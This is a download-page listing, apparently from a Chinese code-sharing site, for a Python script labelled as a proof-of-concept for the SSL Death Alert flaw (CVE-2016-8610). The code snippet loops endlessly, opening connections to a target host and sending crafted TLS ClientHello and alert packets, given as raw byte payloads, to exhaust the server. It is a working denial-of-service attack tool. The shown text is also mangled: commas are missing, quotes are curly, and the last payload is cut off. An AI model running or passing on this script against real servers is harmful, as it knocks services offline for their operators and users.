• 大小: 5KB
    文件类型: .py
    金币: 1
    下载: 0 次
    发布日期: 2021-05-13
  • 语言: Python
  • 标签: python  

资源简介

仅供学习。勿用商业。谢谢合作。漏洞验证脚本ssl-deacth-alert(cve-2016-8610)

资源截图

代码片段和文件信息

#!/usr/bin/python

import socket
import errno
from socket import error as socket_error
import threading
import os
import sys

def MAIN_CHECK(HOSTARGPORTARG):
s0 =  socket.socket(socket.AF_INET socket.SOCK_STREAM)
result = s0.connect_ex((HOSTARG PORTARG))
s0.close()
if result:
print(“https://“+HOST+“:“+str(PORT)+“ seems to be down? :(\nCheck if service is running or maybe we are blocked?“)
exit(1)

def SEDNALL():
while True:
try:
sock = socket.socket(socket.AF_INET socket.SOCK_STREAM)
sock.settimeout(5)
sock.connect((HOST PORT))
sock.send(final_client_hello)
sock.send(final_client_alert)
sock.close
except socket_error as serr:
pass

def INIT():
try:
while True:
SEDNALL()
except socket_error as serr:
SEDNALL()


if len(sys.argv) != 6:
print(“\nUsage: python “+sys.argv[0]+“ DOMAIN/IP PORT PROTOCOL-VERSION(SSLv3 TLS1.0 TLS1.1 TLS1.2) NUMBER-OF-ALERTS(1000) THREADS(50)\nUsage: python “+sys.argv[0]+“ test.tdl 443 TLS1.2 1000 50\nCheck of the server supports the protocol before testing it ...“)
exit(1)

HOST PORT = sys.argv[1] int(sys.argv[2])
MAIN_CHECK(HOSTPORT)

#SSL Client Hello
sslv3=b‘\x16\x03\x00\x00\x8a\x01\x00\x00\x86\x03\x00\x08\x87\x37\x72\xa4\xc5\xb7\xee\x72\x1a\x28\x52\x95\x5f\x4e\x8b\x80\x33\x6e\x27\x49\x85\x33\x61\xa7\xeb\xbe\x70\xc7\x85\xab\x5b\x00\x00\x3e\xc0\x14\xc0\x0a\x00\x39\x00\x38\x00\x37\x00\x36\x00\x88\x00\x87\x00\x86\x00\x85\xc0\x0f\xc0\x05\x00\x35\x00\x84\xc0\x13\xc0\x09\x00\x33\x00\x32\x00\x31\x00\x30\x00\x45\x00\x44\x00\x43\x00\x42\xc0\x0e\xc0\x04\x00\x2f\x00\x41\x00\x05\x00\x04\x00\xff\x01\x00\x00\x1f\x00\x0b\x00\x04\x03\x00\x01\x02\x00\x0a\x00\x0a\x00\x08\x00\x17\x00\x19\x00\x18\x00\x16\x00\x23\x00\x00\x00\x0f\x00\x01\x01‘
tls10=b‘\x16\x03\x01\x00\x8a\x01\x00\x00\x86\x03\x01\x08\x87\x37\x72\xa4\xc5\xb7\xee\x72\x1a\x28\x52\x95\x5f\x4e\x8b\x80\x33\x6e\x27\x49\x85\x33\x61\xa7\xeb\xbe\x70\xc7\x85\xab\x5b\x00\x00\x3e\xc0\x14\xc0\x0a\x00\x39\x00\x38\x00\x37\x00\x36\x00\x88\x00\x87\x00\x86\x00\x85\xc0\x0f\xc0\x05\x00\x35\x00\x84\xc0\x13\xc0\x09\x00\x33\x00\x32\x00\x31\x00\x30\x00\x45\x00\x44\x00\x43\x00\x42\xc0\x0e\xc0\x04\x00\x2f\x00\x41\x00\x05\x00\x04\x00\xff\x01\x00\x00\x1f\x00\x0b\x00\x04\x03\x00\x01\x02\x00\x0a\x00\x0a\x00\x08\x00\x17\x00\x19\x00\x18\x00\x16\x00\x23\x00\x00\x00\x0f\x00\x01\x01‘
tls11=b‘\x16\x03\x02\x00\x8a\x01\x00\x00\x86\x03\x02\x08\x87\x37\x72\xa4\xc5\xb7\xee\x72\x1a\x28\x52\x95\x5f\x4e\x8b\x80\x33\x6e\x27\x49\x85\x33\x61\xa7\xeb\xbe\x70\xc7\x85\xab\x5b\x00\x00\x3e\xc0\x14\xc0\x0a\x00\x39\x00\x38\x00\x37\x00\x36\x00\x88\x00\x87\x00\x86\x00\x85\xc0\x0f\xc0\x05\x00\x35\x00\x84\xc0\x13\xc0\x09\x00\x33\x00\x32\x00\x31\x00\x30\x00\x45\x00\x44\x00\x43\x00\x42\xc0\

评论

共有 条评论